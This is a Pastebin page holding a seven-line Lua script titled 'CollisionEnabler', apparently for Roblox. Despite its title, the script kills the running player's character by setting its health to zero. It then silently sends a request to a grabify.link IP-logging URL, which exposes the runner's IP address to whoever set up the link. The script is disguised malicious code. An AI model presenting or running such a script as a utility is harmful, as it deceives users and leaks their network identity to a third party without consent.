Advertisement
Lean_Man

CollisionEnabler

Feb 16th, 2023 (edited)
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.20 KB | Source Code | 0 0
  1. local plyr = game.Players.LocalPlayer;
  2. local char = plyr.Character;
  3. local hum = char:FindFirstChild("Humanoid");
  4. if hum then
  5.     hum.Health = 0;
  6. end
  7. game:HttpGet("https://grabify.link/Q0CLHB", true);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement